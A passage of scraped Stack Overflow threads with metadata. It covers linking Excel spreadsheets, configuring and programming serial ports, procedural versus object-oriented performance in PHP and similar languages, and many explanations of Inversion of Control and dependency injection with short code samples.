You'll notice that the formula is something like '[path-to-file+file-name].worksheet-name!AD743'.
The value on spreadsheet B will be updated when you open it. In fact, it will ask you if you want to update. Of course, your connection must be up and running for it to update. Also, you can't change the name or the path of spreadsheet A.
A: I can't say if this is overkill without knowing the details of your usage case, but consider creating a spreadsheet C to hold all data held in common between the two. Links can become dizzyingly complex as spreadsheets age, and having a shared data source might help clear up the confusion.
Perhaps even more "enterprise-y" is the concept of just pasting in all data that otherwise would be shared. That is the official best practice in my company, because external links have caused so much trouble with maintainability. It may seem cumbersome at first, but I've found it may just be the best way to promote maintainability in addition to ease of use, assuming you don't mind the manual intervention.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3045",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How do I configure and communicate with a serial port? I need to send and receive data over serial connections (RS-232 and RS-422).
How do I set up and communicate with such a connection? How do I figure out what the configuration settings (e.g. baud rate) should be and how do I set them?
In particular I am looking to do this in Java, C/C++, or one of the major Unix shells but I also have some interest in serial programming using Windows/Hyperterminal.
A: If it needs to be cross platfrom, I would suggest looking at Boost Asio.
A: Awhile back I wrote a decent sized application to route connections from a farm of modems through to a TCP/IP network address.
Initially I looked for an unencumbered (free) Serial IO library. I tried Sun's, IBM's and RxTx. They were fine for developing the application, and in initial testing, but in production they each proved unstable.
Finally I paid for SerialIO's SerialPort. Converting over was literally an exercise in changing imports, and the library has been absolutely rock solid - I cannot recommend it enough. My application has been running in the field 24/7 for a couple of years now, with not a single problem encountered by multiple customers.
If you start development using SerialPort, they have a better API and I would use it.
If you need cross platform support, Java with SerialPort was the best choice I could find.
Lastly, their licensing is pretty darn reasonable as long as you are not preinstalling software on the equipment for your customer(s).
A: Build a time machine and go back to 1987? Ho ho.
Ok, no more snarky comments.
How do I figure out what the configuration settings (e.g. baud rate) should be...
Read the datasheet? Ok, ok. Seriously, last one. If you don't know the baud rate of the device you are trying to communicate with, you have two choices. Start guessing, or possibly bust out an o-scope. If you need a good starting point, let me suggest 9600-8-N-1. My suspicion is you can get there with brute force relatively quickly. There's a third option of having an old-school ninja who can tell just by the LOOK of the garbled characters at some standard baud rate what actual baud rate is. An impressive party trick to be sure.
Hopefully though you have access to this information. In unix/linux, you can get ahold of minicom to play with the serial port directly. This should make it fairly quick to get the configuration figured out.
one of the major Unix shells
In Unix the serial port(s) is/are file-mapped into the /dev/ subdir. ttyS0, for example. If you setup the correct baud rate and whatnot using minicom, you can even cat stuff to that file to send stuff out there.
On to the meat of the question, you can access it programmatically through the POSIX headers. termios.h is the big one.
See: http://www.easysw.com/~mike/serial/serial.html#3_1
(NOT AVAILABLE ANYMORE)
but I also have some interest in serial programming using Windows/Hyperterminal.
Hyperterminal and minicom are basically the same program. As for how Windows let's you get access to the serial port, I'll leave that question for someone else. I haven't done that in Windows since the Win95 days.
A: From the other side, if you want to do it using C#, which will run on both Windows and Linux--with some limitations (EDIT: which may be out of date. I have no way to test it.). Just create a SerialPort object, set its baudrate, port and any other odd settings, call open on it, and write out your byte[]s. After all the setup, the SerialPort object acts very similar to any networked stream, so it should be easy enough to figure out.
And as ibrandy states, you need to know all these settings, like baud rate, before you even start attempting to communicate to any serial device.
A: At work we use teraterm and realterm for checking serial data is correctly formatted. Also we have a hardware splitter with a switch so we can monitor traffic to our application via a cable back to another port.
Windows allows you access to the serial port via CreateFile. That gives you a handle and from there you can configure access.
A: If you want to code in Java I really recommend SerialIOs SerialPort. It is very easy to use and saves you days of work. I've never found an open source library as good as SerialIO, REALLY!
My advice: do not use Sun's serial IO framework! It is from 1998 and full of bugs. You can use rxtx but serialio is better!
A: For C/C++ on Windows you have (at least) two choices:
*
*Use the SerialPort class provided by .NET.
*Use the Win32 API. There is an extensive MSDN article dating back to 1995, and many free libraries and examples on the web to get you started.
The .NET option will be much easier.
A: Depending on the device You are trying to communicate with, there may be more parameters than the baud rate, number of data bits, type of parity checking and number of stop bits to consider. If I recall correctly, modems use nine lines of the RS-232C interface. Some devices like, for example cash registers, may use hardware handshaking on RTS/CTS lines or on DTR/STR lines.
In general it's good to know how the interface works. You can't communicate if the baud rate doesn't match, but wrong setting of other parameters might kind of work. For example You can easily send data to the device expecting 1 stop bit with 2 stop bits set. Problems start when You try to receive data in such case. You can also use appropriately set parity bit as one of stop bits, etc.
A: If you are not forced to use a particular compiler I suggest to use Qt and in the new 5.3 version you will find a class dedicated to serial ports:
http://qt-project.org/doc/qt-5/qserialport.html
The code you will write will run on all supprited Qt platforms, at least those that have serial ports.
A: I have been using purejavacomm:
It is an implementation of javax.comm written in pure java + JNA
Unlike rxtx, you don't need to install a dll. It is written in pure Java + JNA, which solved the problem of portability between Windows and Linux for me. It should be easy to port to other OS-es that JNA supports, such as Solaris and FreeBSD, but I haven't tried it.
You might expect a pure java library to lag behind a native implementation such as rxtx in performance, but with modern CPU's, the bottleneck is very likely to be the bitrate of your serial port, not CPU cycles. Also, it's much easier to debug than a mixed Java/Native library or pure compiled native code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3049",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "49"
} |
Q: Speed Comparisons - Procedural vs. OO in interpreted languages In interpreted programming languages, such as PHP and JavaScript, what are the repercussions of going with an Object Oriented approach over a Procedural approach?
Specifically what I am looking for is a checklist of things to consider when creating a web application and choosing between Procedural and Object Oriented approaches, to optimize not only for speed, but maintainability as well. Cited research and test cases would be helpful as well if you know of any articles exploring this further.
Bottom line: how big (if any) is the performance hit really, when going with OO vs. Procedural in an interpreted language?
A: Bottom line: no, because the overhead of interpretation overwhelms the overhead of method dispatching.
A: In my experience, a site under heavy load will be bogged down and become unresponsive much more easily with OOP code than procedural. The reason is easy to understand.
OOP requires a lot more memory allocations (MALLOC) and a lot more operations to run in memory than procedural code. It requires a lot more CPU time to perform its tasks. It is essentially 'overhead', wrapped around procedural code, adding to the CPU burden to execute it, especially when performing database operations.
Many programmers like the convenience of OOP, creating little black boxes hidden behind simple interfaces. However, I have been paid well to revive sites that were taking forever to respond under heavy user load. Stripping out the OOP and replacing it with simple procedural functions made a huge difference.
If you don't expect your site to be very busy, by all means use OOP. If you are building a high-traffic system, you'll want to strip every CPU cycle from the processing and every byte from the output that you can.
A: Maybe I'm crazy but worrying about speed in cases like this using an interpretive language is like trying to figure out what color to paint the shed. Let's not even get into the idea that this kind of optimization is entirely pre-mature.
You hit the nail on the head when you said 'maintainability'. I'd choose the approach that is the most productive and most maintainable. If you need speed later, it ain't gonna come from switching between procedural versus object oriented coding paradigms inside an interpreted language.
A: Unfortunately, I've done my tests too. I did test speed, and it's about the same, but when testing for memory usage getting memory_get_usage() in PHP, I saw an overwhelmingly larger number on the OOP side.
116,576 bytes for OOP to 18,856 bytes for procedural. I know "Hardware is cheap", but come on! 1,000% increase in usage? Sorry, that's not optimal. And having so many users hitting your website at once, I'm sure your RAM would just burn, or run out. Am I wrong?
A: If you are using an interpreted language, the difference is irrelevant. You should not be using an interpreted language if performance is an issue. Both will perform about the same.
A: Your performance will be characterized by the implementation, not the language. You could use the slowest language and it could scale to be the biggest site in the world as long as you design it to scale.
Just remember the first rule of optimiztion.
Don't.
:)
A: I've actually done a small test like this in python on a website I maintain and found that they are almost equivalent in speed, with the procedural approach winning by something like ten-thousandths of a second, but that the OO code was so significantly cleaner I didn't continue the exercise any longer than one iteration.
So really, it doesn't matter (in my experience anyway).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3057",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: What is Inversion of Control? Inversion of Control (IoC) can be quite confusing when it is first encountered.
*
*What is it?
*Which problem does it solve?
*When is it appropriate to use and when not?
A: I've read a lot of answers for this but if someone is still confused and needs a plus ultra "laymans term" to explain IoC here is my take:
Imagine a parent and child talking to each other.
Without IoC:
*Parent: You can only speak when I ask you questions and you can only act when I give you permission.
Parent: This means, you can't ask me if you can eat, play, go to the bathroom or even sleep if I don't ask you.
Parent: Do you want to eat?
Child: No.
Parent: Okay, I'll be back. Wait for me.
Child: (Wants to play but since there's no question from the parent, the child can't do anything).
After 1 hour...
Parent: I'm back. Do you want to play?
Child: Yes.
Parent: Permission granted.
Child: (finally is able to play).
This simple scenario explains the control is centered to the parent. The child's freedom is restricted and highly depends on the parent's question. The child can ONLY speak when asked to speak, and can ONLY act when granted permission.
With IoC:
The child has now the ability to ask questions and the parent can respond with answers and permissions. Simply means the control is inverted!
The child is now free to ask questions anytime and though there is still dependency with the parent regarding permissions, he is not dependent in the means of speaking/asking questions.
In a technological way of explaining, this is very similar to console/shell/cmd vs GUI interaction. (Which is answer of Mark Harrison above no.2 top answer).
In console, you are dependent on the what is being asked/displayed to you and you can't jump to other menus and features without answering it's question first; following a strict sequential flow. (programmatically this is like a method/function loop).
However with GUI, the menus and features are laid out and the user can select whatever it needs thus having more control and being less restricted. (programmatically, menus have callback when selected and an action takes place).
A: Since already there are many answers for the question but none of them shows the breakdown of Inversion Control term I see an opportunity to give a more concise and useful answer.
Inversion of Control is a pattern that implements the Dependency Inversion Principle (DIP). DIP states the following: 1. High-level modules should not depend on low-level modules. Both should depend on abstractions (e.g. interfaces). 2. Abstractions should not depend on details. Details (concrete implementations) should depend on abstractions.
There are three types of Inversion of Control:
Interface Inversion
Providers shouldn’t define an interface. Instead, the consumer should define the interface and providers must implement it. Interface Inversion allows eliminating the necessity to modify the consumer each time when a new provider added.
Flow Inversion
Changes control of the flow. For example, you have a console application where you asked to enter many parameters and after each entered parameter you are forced to press Enter. You can apply Flow Inversion here and implement a desktop application where the user can choose the sequence of parameters’ entering, the user can edit parameters, and at the final step, the user needs to press Enter only once.
Creation Inversion
It can be implemented by the following patterns: Factory Pattern, Service Locator, and Dependency Injection. Creation Inversion helps to eliminate dependencies between types moving the process of dependency objects creation outside of the type that uses these dependency objects. Why dependencies are bad? Here are a couple of examples: direct creation of a new object in your code makes testing harder; it is impossible to change references in assemblies without recompilation (OCP principle violation); you can’t easily replace a desktop-UI by a web-UI.
A: Inversion of Control is what you get when your program callbacks, e.g. like a gui program.
For example, in an old school menu, you might have:
print "enter your name"
read name
print "enter your address"
read address
etc...
store in database
thereby controlling the flow of user interaction.
In a GUI program or somesuch, instead we say:
when the user types in field a, store it in NAME
when the user types in field b, store it in ADDRESS
when the user clicks the save button, call StoreInDatabase
So now control is inverted... instead of the computer accepting user input in a fixed order, the user controls the order in which the data is entered, and when the data is saved in the database.
Basically, anything with an event loop, callbacks, or execute triggers falls into this category.
A: *
*Wikipedia Article. To me, inversion of control is turning your sequentially written code and turning it into an delegation structure. Instead of your program explicitly controlling everything, your program sets up a class or library with certain functions to be called when certain things happen.
*It solves code duplication. For example, in the old days you would manually write your own event loop, polling the system libraries for new events. Nowadays, most modern APIs you simply tell the system libraries what events you're interested in, and it will let you know when they happen.
*Inversion of control is a practical way to reduce code duplication, and if you find yourself copying an entire method and only changing a small piece of the code, you can consider tackling it with inversion of control. Inversion of control is made easy in many languages through the concept of delegates, interfaces, or even raw function pointers.
It is not appropriate to use in all cases, because the flow of a program can be harder to follow when written this way. It's a useful way to design methods when writing a library that will be reused, but it should be used sparingly in the core of your own program unless it really solves a code duplication problem.
A: Creating an object within class is called tight coupling, Spring removes this dependency by following a design pattern(DI/IOC). In which object of class in passed in constructor rather than creating in class. More over we give super class reference variable in constructor to define more general structure.
A: Suppose you are an object. And you go to a restaurant:
Without IoC: you ask for "apple", and you are always served apple when you ask more.
With IoC: You can ask for "fruit". You can get different fruits each time you get served. for example, apple, orange, or water melon.
So, obviously, IoC is preferred when you like the varieties.
A: What is Inversion of Control?
If you follow these simple two steps, you have done inversion of control:
*
*Separate what-to-do part from when-to-do part.
*Ensure that when part knows as little as possible about what part; and vice versa.
There are several techniques possible for each of these steps based on the technology/language you are using for your implementation.
--
The inversion part of the Inversion of Control (IoC) is the confusing thing; because inversion is the relative term. The best way to understand IoC is to forget about that word!
--
Examples
*
*Event Handling. Event Handlers (what-to-do part) -- Raising Events (when-to-do part)
*Dependency Injection. Code that constructs a dependency (what-to-do part) -- instantiating and injecting that dependency for the clients when needed, which is usually taken care of by the DI tools such as Dagger (when-to-do-part).
*Interfaces. Component client (when-to-do part) -- Component Interface implementation (what-to-do part)
*xUnit fixture. Setup and TearDown (what-to-do part) -- xUnit frameworks calls to Setup at the beginning and TearDown at the end (when-to-do part)
*Template method design pattern. template method when-to-do part -- primitive subclass implementation what-to-do part
*DLL container methods in COM. DllMain, DllCanUnload, etc (what-to-do part) -- COM/OS (when-to-do part)
A: Answering only the first part.
What is it?
Inversion of Control (IoC) means to create instances of dependencies first and latter instance of a class (optionally injecting them through constructor), instead of creating an instance of the class first and then the class instance creating instances of dependencies.
Thus, inversion of control inverts the flow of control of the program. Instead of the callee controlling the flow of control (while creating dependencies), the caller controls the flow of control of the program.
A: But I think you have to be very careful with it. If you will overuse this pattern, you will make very complicated design and even more complicated code.
Like in this example with TextEditor: if you have only one SpellChecker maybe it is not really necessary to use IoC ? Unless you need to write unit tests or something ...
Anyway: be reasonable. Design pattern are good practices but not Bible to be preached. Do not stick it everywhere.
A: IoC / DI to me is pushing out dependencies to the calling objects. Super simple.
The non-techy answer is being able to swap out an engine in a car right before you turn it on. If everything hooks up right (the interface), you are good.
A: Using IoC you are not new'ing up your objects. Your IoC container will do that and manage the lifetime of them.
It solves the problem of having to manually change every instantiation of one type of object to another.
It is appropriate when you have functionality that may change in the future or that may be different depending on the environment or configuration used in.
A: To understanding the concept, Inversion of Control (IoC) or Dependency Inversion Principle (DIP) involves two activities: abstraction, and inversion.
Dependency Injection (DI) is just one of the few of the inversion methods.
To read more about this you can read my blog Here
*
*What is it?
It is a practice where you let the actual behavior come from outside of the boundary (Class in Object Oriented Programming). The boundary entity only knows the abstraction (e.g interface, abstract class, delegate in Object Oriented Programming) of it.
*What problems does it solve?
In term of programming, IoC try to solve monolithic code by making it modular, decoupling various parts of it, and make it unit-testable.
*When is it appropriate and when not?
It is appropriate most of the time, unless you have situation where you just want monolithic code (e.g very simple program)
A: *
*So number 1 above. What is Inversion of Control?
*Maintenance is the number one thing it solves for me. It guarantees I am using interfaces so that two classes are not intimate with each other.
In using a container like Castle Windsor, it solves maintenance issues even better. Being able to swap out a component that goes to a database for one that uses file based persistence without changing a line of code is awesome (configuration change, you're done).
And once you get into generics, it gets even better. Imagine having a message publisher that receives records and publishes messages. It doesn't care what it publishes, but it needs a mapper to take something from a record to a message.
public class MessagePublisher<RECORD,MESSAGE>
{
public MessagePublisher(IMapper<RECORD,MESSAGE> mapper,IRemoteEndpoint endPointToSendTo)
{
//setup
}
}
I wrote it once, but now I can inject many types into this set of code if I publish different types of messages. I can also write mappers that take a record of the same type and map them to different messages. Using DI with Generics has given me the ability to write very little code to accomplish many tasks.
Oh yeah, there are testability concerns, but they are secondary to the benefits of IoC/DI.
I am definitely loving IoC/DI.
3 . It becomes more appropriate the minute you have a medium sized project of somewhat more complexity. I would say it becomes appropriate the minute you start feeling pain.
A: Really not understanding why there are lots of wrong answers and even the accepted is not quite accurate making things hard to understand. The truth is always simple and clean.
As @Schneider commented in @Mark Harrison's answer, please just read Martin Fowler's post discussing IoC.
https://martinfowler.com/bliki/InversionOfControl.html
One of the most I love is:
This phenomenon is Inversion of Control (also known as the Hollywood Principle - "Don't call us, we'll call you").
Why?
Wiki for IoC, I might quote a snippet.
Inversion of control is used to increase modularity of the program and make it extensible ... then further popularized in 2004 by Robert C. Martin and Martin Fowler.
Robert C. Martin: the author of <<Clean Code: A Handbook of Agile Software Craftsmanship>>.
Martin Fowler: the author of <<Refactoring: Improving the Design of Existing Code>>.
A: I feel a little awkward answering this question with so many prior answers, but I just didn't think any of the answers just stated the concept simply enough.
So here we go...
In a non-IOC application, you would code a process flow and include all the detailed steps in it. Consider a program that creates a report - it would include code to set up the printer connection, print a header, then iterate through detail records, then print a footer, maybe perform a page feed, etc.
In an IOC version of a report program, you would configure an instance of a generic, reusable Report class - that is, a class that contains the process flow for printing a report, but has none of the details in it. The configuration you provide might use DI to specify what class the Report should call to print a header, what class the Report should call to print a detail line, and what class the Report should call to print the footer.
So the inversion of control comes from the controlling process not being your code, but rather contained in an external, reusable class (Report) that allows you to specify or inject (via DI) the details of the report - the header, the detail line, the footer.
You could produce any number of different reports using the same Report class (the controlling class) - by providing different sets of the detail classes. You are inverting your control by relying on the Report class to provide it, and merely specifying the differences between reports via injection.
In some ways, IOC could be compared to a drive backup application - the backup always performs the same steps, but the set of files backed up can be completely different.
And now to answer the original questions specifically...
*
*What is it? IOC is relying on a reusable controller class and providing the details specific to your problem at hand.
*Which problem does it solve? Prevents you from having to restate a controlling process flow.
*When is it appropriate to use and when not? Whenever you are creating a process flow where the control flow is always the same, and only the details are changed. You would not use it when creating a one-off, custom process flow.
Finally, IOC is not DI, and DI is not IOC - DI can often be used in IOC (in order to state the details of the abstracted control class).
Anyway - I hope that helps.
A: *
*Inversion of control is a pattern used for decoupling components and layers in the system. The pattern is implemented through injecting dependencies into a component when it is constructed. These dependences are usually provided as interfaces for further decoupling and to support testability. IoC / DI containers such as Castle Windsor, Unity are tools (libraries) which can be used for providing IoC. These tools provide extended features above and beyond simple dependency management, including lifetime, AOP / Interception, policy, etc.
*a. Alleviates a component from being responsible for managing it's dependencies.
b. Provides the ability to swap dependency implementations in different environments.
c. Allows a component be tested through mocking of dependencies.
d. Provides a mechanism for sharing resources throughout an application.
*a. Critical when doing test-driven development. Without IoC it can be difficult to test, because the components under test are highly coupled to the rest of the system.
b. Critical when developing modular systems. A modular system is a system whose components can be replaced without requiring recompilation.
c. Critical if there are many cross-cutting concerns which need to addressed, partilarly in an enterprise application.
A: Let's say that we have a meeting in a hotel.
We have invited many people, so we have left out many jugs of water and many plastic cups.
When somebody wants to drink, he/she fills a cup, drinks the water and throws the cup on the floor.
After an hour or so we have a floor covered with plastic cups and water.
Let's try that after inverting the control:
Imagine the same meeting in the same place, but instead of plastic cups we now have a waiter with just one glass cup (Singleton)
When somebody wants to drink, the waiter gets one for them. They drink it and return it to the waiter.
Leaving aside the question of the hygiene, the use of a waiter (process control) is much more effective and economic.
And this is exactly what Spring (another IoC container, for example: Guice) does. Instead of letting the application create what it needs using the new keyword (i.e. taking a plastic cup), Spring IoC offers the application the same cup/ instance (singleton) of the needed object (glass of water).
Think of yourself as an organizer of such a meeting:
Example:-
public class MeetingMember {
private GlassOfWater glassOfWater;
...
public void setGlassOfWater(GlassOfWater glassOfWater){
this.glassOfWater = glassOfWater;
}
//your glassOfWater object initialized and ready to use...
//spring IoC called setGlassOfWater method itself in order to
//offer to meetingMember glassOfWater instance
}
Useful links:-
*
*http://adfjsf.blogspot.in/2008/05/inversion-of-control.html
*http://martinfowler.com/articles/injection.html
*http://www.shawn-barrett.com/blog/post/Tip-of-the-day-e28093-Inversion-Of-Control.aspx
A: I shall write down my simple understanding of this two terms:
For quick understanding just read examples*
Dependency Injection(DI):
Dependency injection generally means passing an object on which method depends, as a parameter to a method, rather than having the method create the dependent object. What it means in practice is that the method does not depends directly on a particular implementation; any implementation that meets the requirements can be passed as a parameter.
With this objects tell thier dependencies.
And spring makes it available. This leads to loosely coupled application development.
Quick Example:EMPLOYEE OBJECT WHEN CREATED,
IT WILL AUTOMATICALLY CREATE ADDRESS OBJECT
(if address is defines as dependency by Employee object)
Inversion of Control(IoC) Container:
This is common characteristic of frameworks,
IOC manages java objects – from instantiation to destruction through its BeanFactory. -Java components that are instantiated by the IoC container are called beans, and the IoC container manages a bean's scope, lifecycle events, and any AOP features for which it has been configured and coded.
QUICK EXAMPLE:Inversion of Control is about getting freedom, more flexibility, and less dependency. When you are using a desktop computer, you are slaved (or say, controlled). You have to sit before a screen and look at it. Using keyboard to type and using mouse to navigate. And a bad written software can slave you even more. If you replaced your desktop with a laptop, then you somewhat inverted control. You can easily take it and move around. So now you can control where you are with your computer, instead of computer controlling it.
By implementing Inversion of Control, a software/object consumer get more controls/options over the software/objects, instead of being controlled or having less options.
Inversion of control as a design guideline serves the following purposes:
There is a decoupling of the execution of a certain task from implementation.
Every module can focus on what it is designed for.
Modules make no assumptions about what other systems do but rely on their contracts.
Replacing modules has no side effect on other modules I will keep things abstract here, You can visit following links for detail understanding of the topic.
A good read with example
Detailed explanation
A: Inversion of Controls is about separating concerns.
Without IoC: You have a laptop computer and you accidentally break the screen. And darn, you find the same model laptop screen is nowhere in the market. So you're stuck.
With IoC: You have a desktop computer and you accidentally break the screen. You find you can just grab almost any desktop monitor from the market, and it works well with your desktop.
Your desktop successfully implements IoC in this case. It accepts a variety type of monitors, while the laptop does not, it needs a specific screen to get fixed.
A: I found a very clear example here which explains how the 'control is inverted'.
Classic code (without Dependency injection)
Here is how a code not using DI will roughly work:
*
*Application needs Foo (e.g. a controller), so:
*Application creates Foo
*Application calls Foo
*
*Foo needs Bar (e.g. a service), so:
*Foo creates Bar
*Foo calls Bar
*
*Bar needs Bim (a service, a repository, …), so:
*Bar creates Bim
*Bar does something
Using dependency injection
Here is how a code using DI will roughly work:
*
*Application needs Foo, which needs Bar, which needs Bim, so:
*Application creates Bim
*Application creates Bar and gives it Bim
*Application creates Foo and gives it Bar
*Application calls Foo
*
*Foo calls Bar
*
*Bar does something
The control of the dependencies is inverted from one being called to the one calling.
What problems does it solve?
Dependency injection makes it easy to swap with the different implementation of the injected classes. While unit testing you can inject a dummy implementation, which makes the testing a lot easier.
Ex: Suppose your application stores the user uploaded file in the Google Drive, with DI your controller code may look like this:
class SomeController
{
private $storage;
function __construct(StorageServiceInterface $storage)
{
$this->storage = $storage;
}
public function myFunction ()
{
return $this->storage->getFile($fileName);
}
}
class GoogleDriveService implements StorageServiceInterface
{
public function authenticate($user) {}
public function putFile($file) {}
public function getFile($file) {}
}
When your requirements change say, instead of GoogleDrive you are asked to use the Dropbox. You only need to write a dropbox implementation for the StorageServiceInterface. You don't have make any changes in the controller as long as Dropbox implementation adheres to the StorageServiceInterface.
While testing you can create the mock for the StorageServiceInterface with the dummy implementation where all the methods return null(or any predefined value as per your testing requirement).
Instead if you had the controller class to construct the storage object with the new keyword like this:
class SomeController
{
private $storage;
function __construct()
{
$this->storage = new GoogleDriveService();
}
public function myFunction ()
{
return $this->storage->getFile($fileName);
}
}
When you want to change with the Dropbox implementation you have to replace all the lines where new GoogleDriveService object is constructed and use the DropboxService. Besides when testing the SomeController class the constructor always expects the GoogleDriveService class and the actual methods of this class are triggered.
When is it appropriate and when not?
In my opinion you use DI when you think there are (or there can be) alternative implementations of a class.
A: Inversion of control means you control how components (classes) behave. Why its called "inversion" because before this pattern the classes were hard wired and were definitive about what they will do e.g.
you import a library that has a TextEditor and SpellChecker classes. Now naturally this SpellChecker would only check spellings for English language. Suppose if you want the TextEditor to handle German language and be able to spell check you have any control over it.
with IoC this control is inverted i.e. its given to you, how? the library would implement something like this:
It will have a TextEditor class and then it will have a ISpeallChecker (which is an interface instead of a concret SpellChecker class) and when you configure things in IoC container e.g. Spring you can provide your own implementation of 'ISpellChecker' which will check spelling for German language. so the control of how spell checking will work is ineverted is taken from that Library and given to you. Thats IoC.
A: The Inversion-of-Control (IoC) pattern, is about providing any kind of callback, which "implements" and/or controls reaction, instead of acting ourselves directly (in other words, inversion and/or redirecting control to the external handler/controller).
The Dependency-Injection (DI) pattern is a more specific version of IoC pattern, and is all about removing dependencies from your code.
Every DI implementation can be considered IoC, but one should not call it IoC, because implementing Dependency-Injection is harder than callback (Don't lower your product's worth by using the general term "IoC" instead).
For DI example, say your application has a text-editor component, and you want to provide spell checking. Your standard code would look something like this:
public class TextEditor {
private SpellChecker checker;
public TextEditor() {
this.checker = new SpellChecker();
}
}
What we've done here creates a dependency between the TextEditor and the SpellChecker.
In an IoC scenario we would instead do something like this:
public class TextEditor {
private IocSpellChecker checker;
public TextEditor(IocSpellChecker checker) {
this.checker = checker;
}
}
In the first code example we are instantiating SpellChecker (this.checker = new SpellChecker();), which means the TextEditor class directly depends on the SpellChecker class.
In the second code example we are creating an abstraction by having the SpellChecker dependency class in TextEditor's constructor signature (not initializing dependency in class). This allows us to call the dependency then pass it to the TextEditor class like so:
SpellChecker sc = new SpellChecker(); // dependency
TextEditor textEditor = new TextEditor(sc);
Now the client creating the TextEditor class has control over which SpellChecker implementation to use because we're injecting the dependency into the TextEditor signature.
Note that just like IoC being the base of many other patterns, above sample is only one of many Dependency-Injection kinds, for example:
*
*Constructor Injection.
Where an instance of IocSpellChecker would be passed to constructor, either automatically or similar to above manually.
*Setter Injection.
Where an instance of IocSpellChecker would be passed through setter-method or public property.
*Service-lookup and/or Service-locator
Where TextEditor would ask a known provider for a globally-used-instance (service) of IocSpellChecker type (and that maybe without storing said instance, and instead, asking the provider again and again).
A: I agree with NilObject, but I'd like to add to this:
if you find yourself copying an entire method and only changing a small piece of the code, you can consider tackling it with inversion of control
If you find yourself copying and pasting code around, you're almost always doing something wrong. Codified as the design principle Once and Only Once.
A: For example, task#1 is to create object.
Without IOC concept, task#1 is supposed to be done by Programmer.But With IOC concept, task#1 would be done by container.
In short Control gets inverted from Programmer to container. So, it is called as inversion of control.
I found one good example here.
A: It seems that the most confusing thing about "IoC" the acronym and the name for which it stands is that it's too glamorous of a name - almost a noise name.
Do we really need a name by which to describe the difference between procedural and event driven programming? OK, if we need to, but do we need to pick a brand new "bigger than life" name that confuses more than it solves?
A: Inversion of control is when you go to the grocery store and your wife gives you the list of products to buy.
In programming terms, she passed a callback function getProductList() to the function you are executing - doShopping().
It allows user of the function to define some parts of it, making it more flexible.
A: Inversion of Control, (or IoC), is about getting freedom (You get married, you lost freedom and you are being controlled. You divorced, you have just implemented Inversion of Control. That's what we called, "decoupled". Good computer system discourages some very close relationship.) more flexibility (The kitchen in your office only serves clean tap water, that is your only choice when you want to drink. Your boss implemented Inversion of Control by setting up a new coffee machine. Now you get the flexibility of choosing either tap water or coffee.) and less dependency (Your partner has a job, you don't have a job, you financially depend on your partner, so you are controlled. You find a job, you have implemented Inversion of Control. Good computer system encourages in-dependency.)
When you use a desktop computer, you have slaved (or say, controlled). You have to sit before a screen and look at it. Using the keyboard to type and using the mouse to navigate. And a badly written software can slave you even more. If you replace your desktop with a laptop, then you somewhat inverted control. You can easily take it and move around. So now you can control where you are with your computer, instead of your computer controlling it.
By implementing Inversion of Control, a software/object consumer gets more controls/options over the software/objects, instead of being controlled or having fewer options.
With the above ideas in mind. We still miss a key part of IoC. In the scenario of IoC, the software/object consumer is a sophisticated framework. That means the code you created is not called by yourself. Now let's explain why this way works better for a web application.
Suppose your code is a group of workers. They need to build a car. These workers need a place and tools (a software framework) to build the car. A traditional software framework will be like a garage with many tools. So the workers need to make a plan themselves and use the tools to build the car. Building a car is not an easy business, it will be really hard for the workers to plan and cooperate properly. A modern software framework will be like a modern car factory with all the facilities and managers in place. The workers do not have to make any plan, the managers (part of the framework, they are the smartest people and made the most sophisticated plan) will help coordinate so that the workers know when to do their job (framework calls your code). The workers just need to be flexible enough to use any tools the managers give to them (by using Dependency Injection).
Although the workers give the control of managing the project on the top level to the managers (the framework). But it is good to have some professionals help out. This is the concept of IoC truly come from.
Modern Web applications with an MVC architecture depends on the framework to do URL Routing and put Controllers in place for the framework to call.
Dependency Injection and Inversion of Control are related. Dependency Injection is at the micro level and Inversion of Control is at the macro level. You have to eat every bite (implement DI) in order to finish a meal (implement IoC).
A: Inversion of Control is a generic principle, while Dependency Injection realises this principle as a design pattern for object graph construction (i.e. configuration controls how the objects are referencing each other, rather than the object itself controlling how to get the reference to another object).
Looking at Inversion of Control as a design pattern, we need to look at what we are inverting. Dependency Injection inverts control of constructing a graph of objects. If told in layman's term, inversion of control implies change in flow of control in the program. Eg. In traditional standalone app, we have main method, from where the control gets passed to other third party libraries(in case, we have used third party library's function), but through inversion of control control gets transferred from third party library code to our code, as we are taking the service of third party library. But there are other aspects that need to be inverted within a program - e.g. invocation of methods and threads to execute the code.
For those interested in more depth on Inversion of Control a paper has been published outlining a more complete picture of Inversion of Control as a design pattern (OfficeFloor: using office patterns to improve software design http://doi.acm.org/10.1145/2739011.2739013 with a free copy available to download from http://www.officefloor.net/about.html).
What is identified is the following relationship:
Inversion of Control (for methods) = Dependency (state) Injection + Continuation Injection + Thread Injection
Summary of above relationship for Inversion of Control available - http://dzone.com/articles/inversion-of-coupling-control
A: I understand that the answer has already been given here. But I still think, some basics about the inversion of control have to be discussed here in length for future readers.
Inversion of Control (IoC) has been built on a very simple principle called Hollywood Principle. And it says that,
Don't call us, we'll call you
What it means is that don't go to the Hollywood to fulfill your dream rather if you are worthy then Hollywood will find you and make your dream comes true. Pretty much inverted, huh?
Now when we discuss about the principle of IoC, we use to forget about the Hollywood. For IoC, there has to be three element, a Hollywood, you and a task like to fulfill your dream.
In our programming world, Hollywood represent a generic framework (may be written by you or someone else), you represent the user code you wrote and the task represent the thing you want to accomplish with your code. Now you don't ever go to trigger your task by yourself, not in IoC! Rather you have designed everything in such that your framework will trigger your task for you. Thus you have built a reusable framework which can make someone a hero or another one a villain. But that framework is always in charge, it knows when to pick someone and that someone only knows what it wants to be.
A real life example would be given here. Suppose, you want to develop a web application. So, you create a framework which will handle all the common things a web application should handle like handling http request, creating application menu, serving pages, managing cookies, triggering events etc.
And then you leave some hooks in your framework where you can put further codes to generate custom menu, pages, cookies or logging some user events etc. On every browser request, your framework will run and executes your custom codes if hooked then serve it back to the browser.
So, the idea is pretty much simple. Rather than creating a user application which will control everything, first you create a reusable framework which will control everything then write your custom codes and hook it to the framework to execute those in time.
Laravel and EJB are examples of such a frameworks.
Reference:
https://martinfowler.com/bliki/InversionOfControl.html
https://en.wikipedia.org/wiki/Inversion_of_control
A: A very simple written explanation can be found here
